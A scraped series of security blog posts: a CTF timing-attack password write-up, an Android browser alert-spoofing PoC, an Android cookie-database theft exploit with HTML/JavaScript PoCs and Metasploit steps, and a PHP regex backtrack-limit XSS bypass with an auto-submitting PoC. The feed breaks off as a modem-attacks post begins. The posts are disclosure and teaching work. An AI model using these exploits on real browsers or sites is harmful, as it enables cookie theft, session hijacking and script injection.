<div class="separator" style="clear: both; text-align: left;">
Now that was something interesting. I started testing the process time with different inputs in hope of find the length of the password or the charset used; for few inputs it remained the same. After few inputs, I submitted password=test and this was the result:</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiw2G2SqSWwXR6srMHtax431OAhwAgdmkL0TEnX6CmoTjjao4Jy5XXrUoLkuzFUr_UbjWLmPSMKRrHGiWuYyUHlRYLQnZ8Dr1aJTiM4jij6VosGT00GsGOSAqKM6vzBABKvQtsmedfBS-E/s1600/Screenshot_30.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiw2G2SqSWwXR6srMHtax431OAhwAgdmkL0TEnX6CmoTjjao4Jy5XXrUoLkuzFUr_UbjWLmPSMKRrHGiWuYyUHlRYLQnZ8Dr1aJTiM4jij6VosGT00GsGOSAqKM6vzBABKvQtsmedfBS-E/s1600/Screenshot_30.png" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
I noticed that the process time was changed. I submitted the same request and noticed that the time fluctuated between 0.09 and 0.10. So I increased the length by adding more characters after the word "test" but the result remained same. Then I started changed the letters of "test" one by one and analyzed the change in time, starting from the end and removed the letter if it didn't effect the time. So I left with only this:</div>
<blockquote class="tr_bq">
<div class="separator" style="clear: both; text-align: left;">
<span style="color: #b45f06;">password=t</span></div>
</blockquote>
When I changed the letter 't' to something else, the time again became zero. I tried all characters on the keyboard and the time remained zero. After putting back 't' the time was again 0.1. At this point, I figured that the first letter of the password might be 't' because it's getting passed through checks and there must be some processing going on on the valid characters which takes some time hence the increment in time. So after that, I added one letter after 't' and tried password=ta but the time remained same i.e. 0.1. So once again I replaced 'a' with every character on my keyboard one after one and when finished upper and lower-case alphabets, I inputted password=t1 and this was the result:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXfOojR9u2GDow-koJ51PcA0VcMuNTazak7t1nL6UMmASEZA6vlWYBmfOnqLynFydwuY4boFbQinXzOnDR-sbrsdoIoeqWU-_2EzB9vcG4v98-88mnXYsv-u2dOf8CB0hqsubStChVbeM/s1600/Screenshot_31.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXfOojR9u2GDow-koJ51PcA0VcMuNTazak7t1nL6UMmASEZA6vlWYBmfOnqLynFydwuY4boFbQinXzOnDR-sbrsdoIoeqWU-_2EzB9vcG4v98-88mnXYsv-u2dOf8CB0hqsubStChVbeM/s1600/Screenshot_31.png" /></a></div>
Yes, an addition of 0.1 in the time. This made me believe that I was going in the right direction and this was indeed the right way to "GUESS" the password. But just to be sure, I checked the third character manually and now I had first three valid characters of the password i.e. "t1c".<br />
<br />
Obviously I didn't know the length of the password. It could have been 100 even 1000 characters long, so I decided code a PHP script to automate the task and "GUESS" the password for me.<br />
<br />
Here is the code of that PHP script:<br />
<br />
<blockquote class="tr_bq">
<span style="color: blue;">http://pastebin.com/raw.php?i=HkFCU2K6</span></blockquote>
It was a little fun coding this one. Here is the output it generated:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIUOgsFETZPsDCCz4042v6oiZpMkRFY580tOVz5ZmHoOYGvZEO0gsUwTImyBXkEUYkFcxJFy3m9Jsb_O-8yeK3mzlasmfD7Y35aQdw4M5r3LkzdAWCls9O3cFe58zpfEMyCZQBs9bf__Q/s1600/Screenshot_2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIUOgsFETZPsDCCz4042v6oiZpMkRFY580tOVz5ZmHoOYGvZEO0gsUwTImyBXkEUYkFcxJFy3m9Jsb_O-8yeK3mzlasmfD7Y35aQdw4M5r3LkzdAWCls9O3cFe58zpfEMyCZQBs9bf__Q/s1600/Screenshot_2.png" /></a></div>
<br />
<br />
"t1ckt0ck_b00m" was the valid password and the MD5 hash of this password was the flag for this challenge.<br />
<br />
So that was it. It was really fun solving some of these challenges and it was indeed a good learning experience.<br />
<br />
<h4>
About The Author</h4>
Sajjad is a penetration tester and security enthusaists. He is a co-founder of CATRAX and REFLUXES where he offers security testing services. </div>
<script>
location.href="http://www.rafaybaloch.com/2017/06/csp-2015-capture-flag-writeup.html";
</script>
Rafayhttp://www.blogger.com/profile/15944091083959815608noreply@blogger.com3tag:blogger.com,1999:blog-3121270199089759062.post-42135128468812841202015-03-11T22:41:00.000-07:002020-05-27T14:33:23.591-07:00Android Browser Kitkat Content Spoofing Vulnerability<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfqGME988ML6XY_OXz8I3HhgIDf9c5YoY6o0p04QkugPLA4UtaFZordf8rscIEmVXxskCJxAFO3CnwKhTQwqrTqd9AQv2wVIFPx79KAshtdzgw2WWPAchm8ulVeVTToRE-724svn9KUcM/s1600/ANDROID.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfqGME988ML6XY_OXz8I3HhgIDf9c5YoY6o0p04QkugPLA4UtaFZordf8rscIEmVXxskCJxAFO3CnwKhTQwqrTqd9AQv2wVIFPx79KAshtdzgw2WWPAchm8ulVeVTToRE-724svn9KUcM/s1600/ANDROID.png" height="319" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
The following is a low risk vulnerability that was found few months ago while testing the latest Android Stock browser on Android Kitkat. The issue that was found is commonly referred as Content spoofing Vulnerability or dialog box spoofing vulnerability which could be used to fake an alert message on a legitimate website.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
In other words, i could display an alert box (Of my choice) on the site of my choice. Whereas in chrome, Firefox and other browser the alert box appears on correct tab. </div>
<div class="separator" style="clear: both; text-align: left;">
</div>
<a name='more'></a><br />
<h4>
POC</h4>
<div class="separator" style="clear: both; text-align: left;">
<a onclick="test()">CLICK</a> </div>
<div class="separator" style="clear: both; text-align: left;">
<script> function test()</div>
<div class="separator" style="clear: both; text-align: left;">
{ window.open('http://bing.com/') setTimeout (function(){alert("HACKED");}, 5000) } </div>
<div class="separator" style="clear: both; text-align: left;">
</script></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Upon executing the above code, the alert box would be displayed on bing.com. </div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgGhlfQp22cM65IMhAzkswj18s01DFZ9_hd6_G6Gc5vYFOz24HX7uP3MVKPpNW8gQUSlEh5X3O93IZi5UmFMYS7zxgsU-vvgNPHFWphLGUFpNtwFy-8_eSL1DVrcHeevle9lAm4yTMH6_g/s1600/unnamed.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgGhlfQp22cM65IMhAzkswj18s01DFZ9_hd6_G6Gc5vYFOz24HX7uP3MVKPpNW8gQUSlEh5X3O93IZi5UmFMYS7zxgsU-vvgNPHFWphLGUFpNtwFy-8_eSL1DVrcHeevle9lAm4yTMH6_g/s1600/unnamed.png" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both;">
</div>
<h4>
Technical Details</h4>
<div class="separator" style="clear: both;">
The issue resides inside of the ASOP browser, and more specifically due to the fact the webview fails to overwrite the <a href="http://developer.android.com/reference/android/webkit/WebChromeClient.html" rel="nofollow" target="_blank">WebChromeClient.onJsAlert()</a> method which is responsible for displaying the javascript alert box and this way webview is not able to switch the JsAlert() to the correct tab.</div>
<div class="separator" style="clear: both;">
</div>
<h4>
Future Releases</h4>
<div class="separator" style="clear: both;">
I have recently reported another medium risk issue present in latest android stock browser, which would be released once the issue is addressed by the Google team. </div>
</div>
<script>
location.href="http://www.rafaybaloch.com/2017/06/android-browser-kitkat-content-spoofing.html";
</script>
Rafayhttp://www.blogger.com/profile/15944091083959815608noreply@blogger.com2tag:blogger.com,1999:blog-3121270199089759062.post-19809549278849758162014-12-29T02:00:00.000-08:002020-05-27T14:33:48.249-07:00Android Browser Cross Scheme Data Exposure + Intent Scheme Attack <div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBKerdVm7x70gdenaNiPwi_3oyQ1TY0r1D9dKMODbevutZgeEAbRPe5SKz06qKTE2z4rB_bUo1MowOWq2oTjiBREYmn5RWwsY7C45EJr8RZRhPmuQeb0SQZZ4KTLLz22dly8yLLK5O1zQ/s1600/_76596407_76592059.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBKerdVm7x70gdenaNiPwi_3oyQ1TY0r1D9dKMODbevutZgeEAbRPe5SKz06qKTE2z4rB_bUo1MowOWq2oTjiBREYmn5RWwsY7C45EJr8RZRhPmuQeb0SQZZ4KTLLz22dly8yLLK5O1zQ/s1600/_76596407_76592059.jpg" height="180" width="320" /></a></div>
<br />
<b>tl;dr </b>This exploit is an issue present in Android browser < 4.4 and several other android browsers which allows an attacker to read sqlite cookie database file and hence exposing all cookies. Along with it we also talk about a Cross Scheme Data exposure attack in Android < 4.4.<br />
<h4>
Introduction</h4>
During my research on ASOP (Stock Browser) I found out that is is possible to open links to local files using file:// protocol by from a webpage by selecting "<b>Open Link in New tab</b>" from the context menu". This itself is does not represent a vulnerability unless there is a way to read local files and use be able to retrieve the files remotely. However, what caught my attention here is this by default is not permitted browsers such as Chrome, Firefox, Opera etc.<br />
<a name='more'></a><br />
The following screenshot demonstrates the error which is obtained when trying to access a local file from context menu.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEifbU_XZKD3-CwcTIZhnKVBeYS63GQsH1fENOd15QJWXBhP2fHHyBqlIZZgdmEqNuhdAoOH061Nw8iD9aMLdPKd5lpFd4Jbbs3J4xp4n9WX40H13U-uOKDpzfaAOMIgrCY_uAunZgn2Itg/s1600/khoso.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEifbU_XZKD3-CwcTIZhnKVBeYS63GQsH1fENOd15QJWXBhP2fHHyBqlIZZgdmEqNuhdAoOH061Nw8iD9aMLdPKd5lpFd4Jbbs3J4xp4n9WX40H13U-uOKDpzfaAOMIgrCY_uAunZgn2Itg/s1600/khoso.png" height="115" width="577" /></a></div>
<br />
<h4>
Attack Plan </h4>
In order to exploit this issue, the following was the attack plan we came up with:<br />
<br />
<b>i) </b>User visits <b>Attacker.com.</b><br />
<b>ii) Attacker.com </b>forces a download (exploit.html) on the victim's browser using content disposition header. The purpose of the exploit.html would be read local files and send it back to the attacker.<br />
<b>iii) </b>The victim opens up a link by selecting "<b>Open Link in New tab</b>" which opens the local file exploit.html which was forced as download. <br />
<b>iv) </b>Our file exploit.html would then be reading other local files and sending it back to the attacker.<br />
<br />
In order to write an effective exploit for the attack, I coped up with<b><a href="https://twitter.com/harupuxa" rel="nofollow" target="_blank"> Haru Sugiyama</a></b> a Security researcher from Japan. He came up with the following POC:<br />
<b><a href="https://www.blogger.com/goog_841362288"><br /></a></b>
<b><a href="http://133.242.134.241/firefox/test.html" rel="nofollow" target="_blank">http://133.242.134.241/firefox/test.html</a></b><br />
<br />
Upon accessing the above page from android browser, it would first force the following file "<b>exploit.html</b>". Both FireFox and Android browser save files to '<b>/sdcard/Download/exploit.html</b>' in case sdcard is available. The exploit.html file would then try reading the other local files. However, this was not easy as it looked at first sight. Let's first talk about how the results from Android Gingerbread were different from Jellbeans.<br />
<b></b>
<br />
<h4>
<b>Android Gingerbread:Observations</b></h4>
In case of Android Gingerbread Emulator build 2.3 we are easily able to read other local files, this represents a vulnerability as in the browser, as it effectively allows a website to perform cross domains data theft and hence violating the <b>same-origin-policy</b>. The impact however is not large as roughly 11.4% of the users now use Android Gingerbread and they are dying slowly just like windows xp.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAE9yGqAlz0CXVqVz8jrwTUHElvlyfzC-wBxSudn04SFMzYiNfb8bJPjMBCOaLgVthFSUHtwjErnEF2SPAItRDoGCbl8mASUO_Lysjea6_CVTfuvPicn_Nl3kY38MONRovW4PC2W87cl0/s1600/6bb44c670f3a1d59f7823d15ea6bf76d_b.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAE9yGqAlz0CXVqVz8jrwTUHElvlyfzC-wBxSudn04SFMzYiNfb8bJPjMBCOaLgVthFSUHtwjErnEF2SPAItRDoGCbl8mASUO_Lysjea6_CVTfuvPicn_Nl3kY38MONRovW4PC2W87cl0/s1600/6bb44c670f3a1d59f7823d15ea6bf76d_b.jpg" height="257" width="577" /></a></div>
<br />
<b></b>
<br />
<h4>
<b>Android JellyBeans: Observations</b></h4>
In case jellybeans we found out that a local file was not able to read a local files, We then tried our old null byte trick and it worked like a charm.<br />
<br />
The following is the POC:<br />
<br />
<blockquote class="tr_bq">
<button onclick="exploit()">Read iframe</button><br />
<button onclick="window.open('\u0000javascript:alert(document.body.innerHTML)','test')">Try \u0000</button><br />
<iframe src="file:/default.prop" name="test" style='width:100%;height:200'></iframe><br />
<script><br />
function exploit() {<br />
var iframe = document.getElementsByTagName('iframe')[0];<br />
try{<br />
alert("Try to read local file.");<br />
alert("contentWindow:"+iframe.contentWindow);<br />
alert("document:"+iframe.contentWindow.document);<br />
alert("body:"+iframe.contentWindow.document.body);<br />
alert("innerHTML:"+iframe.contentWindow.document.body.innerHTML);<br />
} catch(e) {<br />
alert(e);<br />
}<br />
}<br />
</script></blockquote>
<br />
However, due to the discovery of <b><a href="http://www.rafayhackingarticles.net/2014/08/android-browser-same-origin-policy.html" target="_blank">CVE-2014-6041</a> </b>the nullbytes issue was already patched and the above exploit did not work on patched devices.<br />
<h4>
Intent URL Scheme Attack</h4>
<div>
Based upon our above findings it was concluded that in Android Jellybeans the access to local files was not an issue due to the fact that a local file could not read other local files. However Joe Vennix from metasploit team came up with a more strong way to exploit it by abusing the intent scheme. The following paper -> <a href="http://www.mbsd.jp/Whitepaper/IntentScheme.pdf" rel="nofollow" target="_blank">http://www.mbsd.jp/Whitepaper/IntentScheme.pdf</a> describes a potential way of exploiting this issue. The following is the POC described in the paper:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHxC0nMOxMptAVTU-_VgVfmbHxB5bxfmOYJPM5mCY9nhPkRiCDDbcr5veVZu_3FJ4FtAjYaJnaShwrl3dL-fZjAWIRrL5JFOyU-b2FB9AKSikc7jwRQPMC507VCZnQ2bhsNNDhD-G9IfM/s1600/khoso.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHxC0nMOxMptAVTU-_VgVfmbHxB5bxfmOYJPM5mCY9nhPkRiCDDbcr5veVZu_3FJ4FtAjYaJnaShwrl3dL-fZjAWIRrL5JFOyU-b2FB9AKSikc7jwRQPMC507VCZnQ2bhsNNDhD-G9IfM/s1600/khoso.png" height="78" width="577" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both;">
The idea behind the attack vector is to saved a cookie containing javaScript code and trick the victim into opening the sqlite database file. Upon viewing the injected javascript would be executed in the context of a cookie file and would grab the rest of the cookies from the database file.<b> </b>Following is the basic POC, when when executed would read the entire webviewCookieChromium.db file.</div>
<div class="separator" style="clear: both;">
<b><br /></b></div>
<div class="separator" style="clear: both;">
<!doctype html></div>
<div class="separator" style="clear: both;">
<html></div>
<div class="separator" style="clear: both;">
<head><meta name="viewport" content="width=device-width, user-scalable=no" /></head></div>
<div class="separator" style="clear: both;">
<body style='width:100%;font-size: 16px;'></div>
<div class="separator" style="clear: both;">
<a href='file:///data/data/com.android.browser/databases/webviewCookiesChromium.db'></div>
<div class="separator" style="clear: both;">
Redirecting... To continue, tap and hold here, then choose "Open in a new tab"</div>
<div class="separator" style="clear: both;">
</a></div>
<div class="separator" style="clear: both;">
<script></div>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both;">
document.cookie='x=<img src=x onerror=prompt(document.body.innerHTML)>'; </div>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both;">
<span class="Apple-tab-span" style="white-space: pre;"> </span> </script></div>
<div class="separator" style="clear: both;">
</body></div>
<div class="separator" style="clear: both;">
</html></div>
<br />
Joe has created a <a href="https://github.com/rapid7/metasploit-framework/pull/4461" rel="nofollow" target="_blank">Metasploit module</a>, which automates the process of stealing the cookies and sending it back to you , since the db file also contains httponly cookies as well this attack is quite dangerous.<br />
<br />
<h4>
Steps to Reproduce with Metasploit</h4>
<br />
<b><br /></b>
The following screenshots would walk you through the process of exploiting and retrieving the cookies:<br />
<b><br /></b>
<b>Step 1 - Setting up the Module</b><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3viYOYj2rxpPrZv6A_8JWYvlFqIsfCaOieJ0Z359MIkMB8wCR8ZEsWqTDBXIS0Cny6ZYq19GwIDlIgPE5Qj5nFRN5_7f8zD_6DLJfYeLUJjGXirOQJjBKrEVwwMdGcRGnW6dRirKOmd4/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3viYOYj2rxpPrZv6A_8JWYvlFqIsfCaOieJ0Z359MIkMB8wCR8ZEsWqTDBXIS0Cny6ZYq19GwIDlIgPE5Qj5nFRN5_7f8zD_6DLJfYeLUJjGXirOQJjBKrEVwwMdGcRGnW6dRirKOmd4/s1600/1.png" height="86" width="577" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
</div>
<b>Step 2 - Stealing The Cookies</b><br />
<b><br /></b>
<br />
<div class="separator" style="clear: both; text-align: left;">
All you need to sit back and watch the cookies coming to you. </div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhb8489ZwTJpTNOj3BvoRHxZciP3hk2Cjx1a8suklhAjAhJMMwuYA9sYHSY8l-vAwNcHEScs7uZ6Tho3wueZ3ZNbGXRBwkZTkZ5-oQVPlfLYGZUEKKBwGWf0emTkJ3mgTH5UPsgX_hTbnY/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhb8489ZwTJpTNOj3BvoRHxZciP3hk2Cjx1a8suklhAjAhJMMwuYA9sYHSY8l-vAwNcHEScs7uZ6Tho3wueZ3ZNbGXRBwkZTkZ5-oQVPlfLYGZUEKKBwGWf0emTkJ3mgTH5UPsgX_hTbnY/s1600/2.png" height="402" width="577" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<b><br /></b></div>
<div class="separator" style="clear: both; text-align: left;">
<b>Step 3 - Enjoy</b></div>
<div class="separator" style="clear: both; text-align: left;">
<b><br /></b></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiW1chOngsKLA5R45XwqWxNQ4-YkogiHL7JoCTqAQIAtLvpVRnEFJiOK2K42l6971-8kdUFlmD9VLUsxdfoSEsX0k1poNLT5xaIVsE8sgnQecVQoCD3givPErlFAO9WBhUd5irFayTvSfg/s1600/images.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiW1chOngsKLA5R45XwqWxNQ4-YkogiHL7JoCTqAQIAtLvpVRnEFJiOK2K42l6971-8kdUFlmD9VLUsxdfoSEsX0k1poNLT5xaIVsE8sgnQecVQoCD3givPErlFAO9WBhUd5irFayTvSfg/s1600/images.jpg" /></a></div>
<br />
<div>
<h4>
Patch</h4>
</div>
<div>
The access to the data directory was tightened back in Feb 2014, however due to the android patch policies the patch did not make to most of the vendors. </div>
<div>
<h4>
Credits</h4>
</div>
<div>
I would like to thank <u>Tod Beardsley</u> and <u>Joe Vennix</u> from the metasploit team for their extensive support with analyzing and helping to co-ordinate with Google effectively. As well as <u>Haru Sugiyama </u>for his help and support.<br />
<br /></div>
</div>
<script>
location.href="http://www.rafaybaloch.com/2017/06/android-browser-cross-scheme-data.html";
</script>
Rafayhttp://www.blogger.com/profile/15944091083959815608noreply@blogger.com6tag:blogger.com,1999:blog-3121270199089759062.post-79473773940941700432014-12-25T03:33:00.003-08:002020-05-27T14:34:06.824-07:00Bad Meets evil - PHP meets Regular Expressions<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
twi<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7HER88k3vwKWl5guhyEmN4abQ-TOI0skeTFE2LripANyGD4oHpUYMTv27yUNn0u15EyxZ9l7tYXfCi4dVRaRQGqru-6JmXPwK2Ie-mq6lLPRzN3jnmVl1xUGxx7B6iU-303ZEMk3IZsE/s1600/5836012758_17e9e3438a_b.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7HER88k3vwKWl5guhyEmN4abQ-TOI0skeTFE2LripANyGD4oHpUYMTv27yUNn0u15EyxZ9l7tYXfCi4dVRaRQGqru-6JmXPwK2Ie-mq6lLPRzN3jnmVl1xUGxx7B6iU-303ZEMk3IZsE/s1600/5836012758_17e9e3438a_b.jpg" height="640" width="577" /></a></div>
<br />
This article would briefly discuss the reason why Regular Expressions might not be suitable for filtersand how things could turn miserably bad when PHP comes is used with Regular Expressions. The post would then continue with the write-up of a relevant scenario based challenge, and finally will conclude with the author’s opinion on the topic.<br />
<a name='more'></a><br />
<h4 style="text-align: left;">
Common pitfalls of Regular expressions</h4>
<div style="text-align: left;">
RegEx (Regular expressions) are commonly used for pattern matching, searching and replacing purposes; which are handy for string manipulation in different supported back-end programming languages. In reality, there are ton of filters <b>[1] </b>which heavily rely upon RegEx to filter out malicious inputs.<br />
<br />
We have already witnessed <b>[2]</b> why RegEx might not be considered as a good idea. However, one might argue that it is the programmers' fault (or rather choice of options) - they do not consider all the possible test cases for an attack surface scenario. I simply couldn't disagree with this statement. In fact, the Microsoft's current XSS filter <b>[3]</b> is a good example of it. Following are some of the problems:<br />
<br />
<i><b>Problem#1:</b></i> Under the hood for the first problem, the filter currently employs a very long RegEx, to which surprisingly, has no public bypasses available. But one should not forget it actually evolves from the previous vulnerable versions, and one really must have the patience to write such a tedious RegEx. <br />
<br />
<i><b>Problem#2:</b></i> The second problem is that even with a functional RegEx, this entirely could lead to different vulnerabilities. Yes; I'm talking about ReDoS(Regular Expression Denial of Service), an attack which happens to be surfaced in bad constructed Regex wherein attackers could compromise the availability of the application with a specially crafted input. <br />
<br />
In a long run, with the programmer’s perspective, it might be a bit tedious for developers to handle both functionality and security at one hand. Therefore, we conclude that RegEx (Regular Expressions) should be considered evil when being heavily used in filters.</div>
<h4 style="text-align: left;">
PHP + RegEx = ?</h4>
<div style="text-align: left;">
PHP itself is not bad, however when combined with regex becomes bad. Regarding RegEx, Most of the used RegEx functions (i.e. preg_*) in PHP are based upon the <b>PCRE library</b>. The engine itself is not only deficient in terms of performance, but it also opens to have a potential gateway to REDOS vulnerabilities.<br />
<br />
As we can see from a REDOS issue in PHP's famous frame work Code Igniter <b>[4]</b>, a non-harmful RegEx (e.g. `/[a-z]+=/`) can cause a serious performance damange. More importantly, there is a fatal design flaw. In order to prevent resource exhaustion, PHP is so smart that it provides an option called <b>pcre.backtrack_limit. </b>What it does is to limit the number of backtracks (backtrack is a common cause of ReDoS). But what if the number of backtracks reaches the limit? Well, it just doesn't care. In other words, it is possible to evade specific protections when the conditions are met.</div>
<h4 style="text-align: left;">
The write-up</h4>
<div style="text-align: left;">
<br />
In order to demonstrate how serious the problem could be, I had ended up creating a mini XSS puzzle of the kcal.pw series. Here is the sample code for this puzzle:</div>
<blockquote class="tr_bq">
$xss = $_POST['xss'];<br />
if (preg_match('/<(?:\w+)\W+?[\w]/', $xss)) {<br />
echo '<p>I don\'t think so</p>';<br />
} else {<br />
echo $xss;<br />
}</blockquote>
<div style="text-align: left;">
<br />
Let’s take a look at the following RegEx and what see it does: ```/<(?:\w+)\W+?[\w]/```<br />
<br />
It detects any presence of an open tag, followed by any potential attributes, separators and whatsoever. Although the RegEx looks specious, it is technically sufficient for preventing XSS in HTML context. If you look closely, you will find the RegEx utilizes non-greedy matching which requires backtracking. As mentioned before, PHP has a default backtrack limit (pcre.backtrack_limit, 100000). However, PHP favours "fail silently", which makes pcre_match simply returns false instead of throwing an exception when the input reaches the limit. As a result, submitting a long enough payload will bypass the filter.<br />
<br />
Let’s try using the preg_match function to test the regular expression with a large number of A’s:</div>
<blockquote class="tr_bq">
var_dump(preg_match('/<(?:\w+)\W+?[\w]/', '<a/'.str_repeat('\\', 1000000).'/a'))</blockquote>
<div style="text-align: left;">
<br />
The proof of concept is simple. It simulates the input being matched with the vulnerable RegEx (A being repeated 1000000 times). And it does return false.<br />
<br />
<h4>
Proof Of Concept</h4>
</div>
The following is a complete proof of concept that would generate alert(1) on the challenge domain:<br />
<blockquote>
<div dir="ltr" style="text-align: left;" trbidi="on">
<form action="http://s30003-101809-vkp.tarentum.hack.me/index.php" method="post"><br />
<textarea style="display: none" name="xss"></textarea><br />
</form><br />
<script><br />
document.forms[0].xss.value = '<script' + Array(999999).join('/') + '>alert(1)<\/script>';<br />
document.forms[0].submit();<br />
</script></div>
</blockquote>
<h4 style="text-align: left;">
Conclusion</h4>
<div style="text-align: left;">
<br />
The suggestion for the defense is to use RegEx only if absolute necessary. More importantly, avoid writing bad RegEx. Although there are some tools which claim to analyze potential ReDoS problem, the best practice is to again to substantially limit the use of RegEx. Finally, this is a take-away (which is also my “right” rule thumb principle): <br />
<br />
If a filter relies too heavily on a Regex, then it might probably fail its job in terms of security!<br />
<br />
<h4>
About The Author</h4>
<br />
This article has been written by "<b>File Descriptor</b>", he prefers to be called as an "XSS Jigsaw" instead of his real name, which he prefers to keep secret. FD has decided to dedicate his life towards creating and solving XSS challenges and that is what in my opinion a hacker really is, a problem solving expert. You can follow him at <a href="http://twitter.com/filedescriptor" rel="nofollow" target="_blank">@filedescriptor</a><br />
<b><br /></b>
<b>References</b><br />
<b><br /></b>
1. http://www.thespanner.co.uk/2014/10/24/unbreakable-filter/<br />
2. http://stackoverflow.com/questions/1732348/regex-match-open-tags-except-xhtml-self-contained-tags<br />
3. http://www.cloudscan.me/2011/09/mshtmldll-ie-xss-filter-evasion.html<br />
4. https://github.com/bcit-ci/CodeIgniter/issues/3123</div>
</div>
<script>
location.href="http://www.rafaybaloch.com/2017/06/bad-meets-evil-php-meets-regular.html";
</script>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-3121270199089759062.post-43033920408016939362014-12-14T11:40:00.002-08:002020-05-27T14:34:26.366-07:00Common Attacks Against Modems<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEierJYy3k5zg10cxIx-ZDZNkk7iMDj4Xd7JlbA-N5-3ofTnORmEo2_L5M7uxUyYoIhS3iyFTVc0jE0WnbnJ2HYWUHUMCVS-e_EzRrk7Aw4AWPlzYWLNooMXO3CV7eKDSuO72__HdjGyK50/s1600/T-DSL_Modem.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEierJYy3k5zg10cxIx-ZDZNkk7iMDj4Xd7JlbA-N5-3ofTnORmEo2_L5M7uxUyYoIhS3iyFTVc0jE0WnbnJ2HYWUHUMCVS-e_EzRrk7Aw4AWPlzYWLNooMXO3CV7eKDSuO72__HdjGyK50/s1600/T-DSL_Modem.jpg" height="313" width="320" /></a></div>
<h2 style="text-align: left;">
<span id="goog_3749436"></span><span id="goog_3749437"></span></h2>
<h2 style="text-align: left;">
0x01: Introduction to Modems</h2>
<div style="text-align: left;">
